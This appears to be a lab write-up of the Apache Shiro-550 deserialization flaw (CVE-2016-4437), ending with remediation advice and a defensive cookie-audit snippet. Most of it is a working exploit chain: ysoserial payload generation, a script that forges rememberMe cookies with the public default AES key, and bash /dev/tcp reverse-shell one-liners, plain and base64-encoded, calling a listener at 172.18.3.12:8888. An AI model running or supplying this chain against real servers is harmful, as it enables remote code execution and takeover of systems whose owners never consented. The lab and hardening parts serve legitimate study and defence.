
Apache Shiro 1.2.4 Deserialization Vulnerability Shiro-550 (CVE-2016-4437): Analysis and Mitigations

Original source: https://88box.top Generated: 2026-05-21 01:02:21



Updated 2026-05-20 16:38


I. Vulnerability Overview

1. Apache Shiro

Apache Shiro is an open-source security framework that provides authentication, authorization, cryptography and session management. Shiro is intuitive and easy to use while still providing robust security.

2. Affected versions

Apache Shiro <= 1.2.4 (all versions)

Including: 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.x, 1.0.x, etc.

Fixed versions: 1.2.5 and later (including 1.3.x, 1.4.x, 1.5.x, 1.6.x, 1.7.x, 1.8.x, 2.x)

3. How the vulnerability works

In Shiro 1.2.4 and earlier, the RememberMe feature uses a fixed, hard-coded AES key, and the rememberMe data carried in the cookie is decrypted and deserialized directly without any validation. An attacker who uses the default key to build a malicious serialized payload can therefore achieve remote code execution.

II. Environment Setup

1. Setting up the target

Enter the directory

[root@localhost vulhub]# cd shiro

List the directory

[root@localhost shiro]# ls
CVE-2010-3863 CVE-2016-4437 CVE-2020-1957

Enter the directory

[root@localhost shiro]# cd CVE-2016-4437/

Bring up the environment

[root@localhost CVE-2016-4437]# docker compose up -d

Check the containers

[root@localhost CVE-2016-4437]# docker ps

2. Downloading ysoserial

Download ysoserial through a proxy

┌──(root㉿kali)-[~]
└─# proxychains wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar -O ysoserial-all.jar

Check

┌──(root㉿kali)-[~]
└─# ls
Desktop Documents Downloads EHole Music Pictures Public Templates Videos ysoserial-0.0.6-all.jar

Test that it runs

┌──(root㉿kali)-[~]
└─# java -jar ysoserial-all.jar

It took me quite a while to find the download link.

3. AES encryption script

Python version

import base64
from Crypto.Cipher import AES

# Read the generated poc.bin
with open("poc.bin", "rb") as f:
    payload = f.read()

# Shiro default key
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

# Generate a random IV (pycryptodome creates one when no IV is passed)
iv = AES.new(key, AES.MODE_CBC).iv

# PKCS7 padding
def pad(s):
    bs = AES.block_size
    return s + (bs - len(s) % bs) * bytes([bs - len(s) % bs])

# Encrypt
payload = pad(payload)
encrypted = AES.new(key, AES.MODE_CBC, iv).encrypt(payload)

# Output the final rememberMe value: base64(IV || ciphertext)
result = base64.b64encode(iv + encrypted).decode()
print("rememberMe=" + result)

Java version

package org.vulhub.shirodemo;

import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.Base64;
import org.apache.shiro.io.DefaultSerializer;
import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;

public class TestRemember {
    public static void main(String[] args) throws Exception {
        // Read the serialized object produced by ysoserial
        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));
        // Shiro's own AES-CBC cipher service, with the default key
        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));
        // encrypt() prepends a random IV and toString() base64-encodes IV || ciphertext
        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.println(ciphertext.toString());
    }
}

4. Generating the POC

A note here: Kali's JDK is version 21, but ysoserial needs JDK 8 to work, so if you do not run it with JDK 8 you will hit the problem I show below.

Generate the POC

┌──(root㉿kali)-[~]
└─# java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.bin

Install JDK 8 from the Kali repositories (it is not in the repositories, so it has to be downloaded from the official site instead)

┌──(root㉿kali)-[~]
└─# apt install openjdk-8-jdk

Use the official Adoptium API direct link

┌──(root㉿kali)-[~]
└─# proxychains wget -O jdk8.tar.gz \
"https://api.adoptium.net/v3/binary/latest/8/ga/linux/x64/jdk/hotspot/normal/eclipse"

Extract

┌──(root㉿kali)-[~]
└─# tar -xvf jdk8.tar.gz

Move it

┌──(root㉿kali)-[~]
└─# mv jdk8u492-b09 /opt/jdk8

Add an alias

┌──(root㉿kali)-[~]
└─# alias java8='/opt/jdk8/bin/java'

Generate the POC

┌──(root㉿kali)-[~]
└─# java8 -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/success" > poc.bin

III. Reproducing the Vulnerability

1. Visit the home page

2. Generating rememberMe

Generate rememberMe

┌──(root㉿kali)-[~]
└─# python shiro_exp.py

Install the pycryptodome library

┌──(root㉿kali)-[~]
└─# pip3 install pycryptodome

Newer Kali releases have a system protection mechanism that refuses to install pip packages directly, so a flag is needed

┌──(root㉿kali)-[~]
└─# pip3 install pycryptodome --break-system-packages

┌──(root㉿kali)-[~]
└─# python shiro_exp.py


3. Sending the attack request

First check inside the container whether the success file exists

Check the containers

[root@localhost ~]# docker ps

Check the container's tmp directory

[root@localhost ~]# docker exec 02fbc4cedb3d ls -la /tmp

Checking the tmp directory again shows that the file has been created: the attack succeeded.

4. Reverse shell

TCP reverse shell examples

bash -i >& /dev/tcp/172.18.3.12/8888 0>&1

/bin/bash -i > /dev/tcp/172.18.3.12/8888 0<&1 2>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}

Generate the reverse shell payload

┌──(root㉿kali)-[~]
└─# java8 -jar ysoserial-all.jar CommonsBeanutils1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTguMy4xMi84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > shell.ser

Replace the file name in the Python script

┌──(root㉿kali)-[~]
└─# sed -i 's/poc.bin/shell.ser/g' shiro_exp.py

Generate rememberMe

┌──(root㉿kali)-[~]
└─# python shiro_exp.py


Listen on port 8888 on Kali, send the request and check whether the target is under control

┌──(root㉿kali)-[~]
└─# nc -lvnp 8888
listening on [any] 8888 ...

IV. Reproducing with Other Tools

1. Shiro deserialization tool

On the attacking host, open the Shiro deserialization exploitation tool, select the vulnerability type shiro550, and fill in the target address in the address bar, http://192.168.88.130 (I rebuilt the environment here, which is why the IP address is different; everything else in the environment is the same).

2. DNS out-of-band detection

CEYE is a monitoring platform for detecting out-of-band data such as DNS queries and HTTP requests. It helps security researchers collect information while testing for vulnerabilities such as SSRF, XXE and RCE (if dnslog does not detect anything here, switch to ceye; neither is very stable).

3. Gadget chain succeeded

4. Reverse shell

Listen on port 8000

[root@CentOS7 ~]# nc -lvp 8000

Check privileges

root@1d7284f53b38:/# id

Check the IP address

root@1d7284f53b38:/# ip add

At this point the attack has succeeded. One more note: the Shiro key may be the default or something else, so the approach is much the same as brute forcing; key lists can be collected or downloaded, and this is not the only tool available, for example ShiroAttack2 and shiro-exploit can be installed on Kali, or you can write your own Python script.

V. Remediation

1. Root cause

Shiro's default hard-coded AES key kPH+bIxk5D2deZiIxcaaaA== is publicly known;

CBC mode is used and a deserialization vulnerability exists;

an attacker can craft a malicious rememberMe cookie that triggers deserialization and RCE.

2. Primary fixes

Stop using the default key: generate a new high-strength random Base64 key and configure it in shiro.ini / yml

Upgrade to 1.2.7 or later (the stable 1.3.x / 2.x releases are recommended)

If the business does not need it, disable rememberMe outright and remove the exploit path at its source.
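The shiro.ini setting behind the first fix above, as an added example (not taken from the page or from the Shiro project): the public default key that must never be configured, beside a per-deployment key. The property names are those of Shiro 1.x's CookieRememberMeManager; the key value is a placeholder to be replaced with 16 random bytes encoded as base64.

```ini
[main]
# Weak: Shiro <= 1.2.4 falls back to this built-in key when no cipherKey is set.
# Never configure it explicitly either; it is public and is the key the page's script uses.
# rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA==

# Hardened: one key per deployment, generated offline, e.g. with `openssl rand -base64 16`
rememberMeManager = org.apache.shiro.web.mgt.CookieRememberMeManager
rememberMeManager.cipherKey = REPLACE_WITH_BASE64_OF_16_RANDOM_BYTES
securityManager.rememberMeManager = $rememberMeManager
```

On 1.2.5 and later, leaving cipherKey unset makes Shiro generate a random key at startup, so rememberMe cookies stop validating after a restart or across cluster nodes; a configured per-deployment key is still the right choice there.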

3. Operational hardening

Add WAF rules: block overlong or malicious rememberMe cookies and known payload signatures

Scan assets regularly for the Shiro fingerprint together with the default key

Run the server with least privilege to limit the blast radius after an RCE

Restrict external access to back-office management interfaces
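The defender's side of the scan and WAF items above, as an added example (not the page's script and not Shiro's own code): a Go audit of a rememberMe cookie taken from your own deployment that reports whether it still decrypts under the default key, using the IV || AES-CBC || PKCS#7 layout the page's script produces, and whether it exceeds a length threshold of the kind a WAF rule would use. The default key and the cookie layout come from the page; MaxCookieLen, the constructed sample plaintext and the EncryptForTest helper are assumptions of this example.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
)

// DefaultKeyB64 is the hard-coded Shiro <= 1.2.4 cipherKey quoted on this page.
const DefaultKeyB64 = "kPH+bIxk5D2deZiIxcaaaA=="
// MaxCookieLen is an assumed WAF threshold (not from the page); legitimate cookies are far smaller.
const MaxCookieLen = 2048
// javaStreamMagic is the Java serialization header: STREAM_MAGIC 0xACED, version 5.
var javaStreamMagic = []byte{0xac, 0xed, 0x00, 0x05}

// AuditRememberMe checks one cookie value: overlong = decoded length > MaxCookieLen;
// usesDefaultKey = it decrypts under the default key to a PKCS#7-padded Java stream.
func AuditRememberMe(cookie string) (overlong, usesDefaultKey bool, err error) {
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil {
		return false, false, err
	}
	overlong = len(raw) > MaxCookieLen
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return overlong, false, nil // not the IV || ciphertext layout Shiro emits
	}
	key, _ := base64.StdEncoding.DecodeString(DefaultKeyB64)
	block, _ := aes.NewCipher(key) // 16-byte key, cannot fail
	pt := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(pt, raw[aes.BlockSize:])
	// A wrong key gives random bytes; valid PKCS#7 padding plus the 4-byte header is the signal.
	pad := int(pt[len(pt)-1])
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return overlong, false, nil
	}
	return overlong, bytes.HasPrefix(pt, javaStreamMagic), nil
}

// EncryptForTest builds a cookie in the page's layout (random IV, AES-CBC, PKCS#7) under any key,
// so the audit can be exercised offline on constructed plaintext; it is a test helper only.
func EncryptForTest(keyB64 string, plaintext []byte) string {
	key, _ := base64.StdEncoding.DecodeString(keyB64)
	block, _ := aes.NewCipher(key)
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	iv := make([]byte, aes.BlockSize)
	rand.Read(iv)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return base64.StdEncoding.EncodeToString(append(iv, out...))
}
```

A cookie that is flagged by usesDefaultKey means the application is still running with the public key, regardless of version; an overlong cookie alone is only a heuristic and belongs in a WAF rule, not a verdict.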

VI. References

Detailed analysis of the Shiro deserialization vulnerability: https://www.anquanke.com/post/id/228889

Shiro deserialization analysis with approach and component detection notes: https://xz.aliyun.com/t/8997

Introduction to Shiro and its main flow: https://www.cnblogs.com/insaneXs/p/10999384.html

vulhub environment README: https://github.com/vulhub/vulhub/blob/master/shiro/CVE-2016-4437/README.zh-cn.md



🏷 Tags: Apache Shiro, deserialization vulnerability, CVE-2016-4437, Shiro-550, Java security